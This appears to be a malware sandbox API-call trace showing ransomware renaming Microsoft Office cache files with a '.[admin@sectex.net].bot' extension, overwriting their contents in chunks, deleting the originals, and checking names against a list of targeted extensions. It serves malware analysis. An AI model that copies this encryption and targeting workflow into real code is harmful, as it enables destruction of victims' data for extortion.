	[0048.187] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020
	[0048.187] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.187] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0048.188] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0048.188] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0048.188] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.188] ReadFile (in: hFile=0x1b0, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.193] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.193] ReadFile (in: hFile=0x1b0, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.196] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0048.196] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.196] ReadFile (in: hFile=0x1b0, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.211] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.211] WriteFile (in: hFile=0x1b0, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0048.417] SetEndOfFile (hFile=0x1b0) returned 1
	[0048.417] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0048.421] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.421] WriteFile (in: hFile=0x1b0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.421] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.422] WriteFile (in: hFile=0x1b0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.422] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.422] WriteFile (in: hFile=0x1b0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.424] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0048.424] CloseHandle (hObject=0x1b0) returned 1
	[0048.424] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString=".doc") returned 4
	[0048.425] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString=".docx") returned 5
	[0048.425] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0048.425] lstrlenW (lpString=".pdf") returned 4
	[0048.425] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString=".xls") returned 4
	[0048.425] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString=".xlsx") returned 5
	[0048.425] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0048.425] lstrlenW (lpString=".ppt") returned 4
	[0048.425] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString=".zip") returned 4
	[0048.425] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString=".rar") returned 4
	[0048.425] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString=".bz2") returned 4
	[0048.425] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0048.425] lstrlenW (lpString=".7z") returned 3
	[0048.425] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString=".dbf") returned 4
	[0048.425] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString=".1cd") returned 4
	[0048.425] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0048.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.425] lstrlenW (lpString=".jpg") returned 4
	[0048.426] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString=".doc") returned 4
	[0048.426] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString=".docx") returned 5
	[0048.426] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0048.426] lstrlenW (lpString=".pdf") returned 4
	[0048.426] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString=".xls") returned 4
	[0048.426] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString=".xlsx") returned 5
	[0048.426] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0048.426] lstrlenW (lpString=".ppt") returned 4
	[0048.426] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString=".zip") returned 4
	[0048.426] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString=".rar") returned 4
	[0048.426] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString=".bz2") returned 4
	[0048.426] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0048.426] lstrlenW (lpString=".7z") returned 3
	[0048.426] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString=".dbf") returned 4
	[0048.426] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString=".1cd") returned 4
	[0048.426] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0048.426] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0048.426] lstrlenW (lpString=".jpg") returned 4
	[0048.426] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0048.427] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bot") returned 1
	[0048.427] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24
	[0048.427] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0048.979] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=715834) returned 1
	[0048.979] CloseHandle (hObject=0x194) returned 1
	[0048.979] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020
	[0048.979] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.979] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0048.979] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.979] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.979] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0048.980] GetLastError () returned 0x0
	[0048.980] ReadFile (in: hFile=0x194, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xaec3a, lpOverlapped=0x0) returned 1
	[0049.008] WriteFile (in: hFile=0x1b0, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xaec40, lpOverlapped=0x0) returned 1
	[0049.020] ReadFile (in: hFile=0x194, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.020] WriteFile (in: hFile=0x1b0, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0049.021] SetEndOfFile (hFile=0x1b0) returned 1
	[0049.021] CloseHandle (hObject=0x1b0) returned 1
	[0049.021] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.021] SetEndOfFile (hFile=0x194) returned 1
	[0049.027] CloseHandle (hObject=0x194) returned 1
	[0049.027] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0049.027] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1
	[0049.027] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.027] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.027] lstrlenW (lpString=".doc") returned 4
	[0049.027] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0049.027] lstrlenW (lpString=".docx") returned 5
	[0049.027] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0049.027] lstrlenW (lpString=".pdf") returned 4
	[0049.027] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0049.027] lstrlenW (lpString=".xls") returned 4
	[0049.027] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".xlsx") returned 5
	[0049.028] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0049.028] lstrlenW (lpString=".ppt") returned 4
	[0049.028] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString=".zip") returned 4
	[0049.028] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".rar") returned 4
	[0049.028] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".bz2") returned 4
	[0049.028] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".7z") returned 3
	[0049.028] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString=".dbf") returned 4
	[0049.028] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString=".1cd") returned 4
	[0049.028] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString=".jpg") returned 4
	[0049.028] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.028] lstrlenW (lpString=".doc") returned 4
	[0049.028] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".docx") returned 5
	[0049.028] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0049.028] lstrlenW (lpString=".pdf") returned 4
	[0049.028] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".xls") returned 4
	[0049.028] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0049.028] lstrlenW (lpString=".xlsx") returned 5
	[0049.028] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0049.029] lstrlenW (lpString=".ppt") returned 4
	[0049.029] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.029] lstrlenW (lpString=".zip") returned 4
	[0049.029] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString=".rar") returned 4
	[0049.029] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString=".bz2") returned 4
	[0049.029] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString=".7z") returned 3
	[0049.029] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.029] lstrlenW (lpString=".dbf") returned 4
	[0049.029] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.029] lstrlenW (lpString=".1cd") returned 4
	[0049.029] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0049.029] lstrlenW (lpString=".jpg") returned 4
	[0049.029] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0049.029] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0049.029] lstrlenW (lpString="Office32WW.msi") returned 14
	[0049.029] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0049.030] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=1992192) returned 1
	[0049.030] CloseHandle (hObject=0x194) returned 1
	[0049.030] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020
	[0049.030] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.030] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0049.030] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0049.030] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0049.031] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.031] ReadFile (in: hFile=0x194, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.209] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.209] ReadFile (in: hFile=0x194, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.212] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0049.212] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.212] ReadFile (in: hFile=0x194, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.715] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.715] WriteFile (in: hFile=0x194, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0049.736] SetEndOfFile (hFile=0x194) returned 1
	[0049.736] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xbb10048
	[0050.121] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.121] WriteFile (in: hFile=0x194, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.123] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.123] WriteFile (in: hFile=0x194, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.125] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.125] WriteFile (in: hFile=0x194, lpBuffer=0xbb10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xbb10048*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.127] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb10048 | out: hHeap=0x7d60000) returned 1
	[0050.131] CloseHandle (hObject=0x194) returned 1
	[0050.131] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.131] lstrlenW (lpString=".doc") returned 4
	[0050.131] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.131] lstrlenW (lpString=".docx") returned 5
